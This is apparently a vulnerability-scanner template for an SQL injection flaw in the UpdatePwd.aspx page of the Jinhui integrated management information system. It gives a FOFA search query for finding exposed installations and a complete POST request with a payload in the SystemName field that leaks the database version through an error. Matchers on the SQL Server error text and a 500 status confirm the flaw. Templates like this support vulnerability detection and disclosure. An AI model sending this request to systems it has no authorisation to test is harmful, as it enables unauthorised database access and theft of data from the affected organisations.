## id: VEID-2026-11127
## name: 金慧-综合管理信息系统 UpdatePwd.aspx 存在SQL注入漏洞
## author: hack007x
## severity: high
## tags: veid,sql,veid2026
## description: 金慧-综合管理信息系统 UpdatePwd.aspx 存在SQL注入漏洞，攻击者可进行sql注入攻击获取数据库信息或者权限。
## affects: 金慧-综合管理信息系统
## fofa-query: body="/Portal/LoginBegin.aspx" || body="/portal/LoginBegin.aspx"
## verification: true



POST /Portal/UpdatePwd.aspx?LoginName= HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIwNjIxOTEwOWRkBbaTvhv%2ByWbTKSTVx1y6E7qFnAo%3D&__VIEWSTATEGENERATOR=7FC147DC&__EVENTVALIDATION=%2FwEdAAeBOWHyzxoRUImq0lfI2qvAUYglfMtBarbH2LeBEFZ3blwK8%2F1gnn25OldlRNyIedkf1P6GTiFbwnVHMajaCmuzDXCKeN7Biz3dpLrvtu21sFabMRbi%2F2A4oZV6XkcK0do6klUczeYxH4SdGieOR28Q1VJ0AFks4WshtgQDeQmeEVRN5uY%3D&SystemName='+or+1=@@version--&Password=&NewPassword1=&NewPassword2=&ButtonSave=%E7%A1%AE%E5%AE%9A


#@ condition: and
#@ matcher: body contains "转换成数据类型 int 时失败"
#@ matcher: status_code == 500







# @VEIL-STAMP: b02074269774933ce4bd8bd2c9cadcc03fa2614b1d566ce7787ba339d29dde34
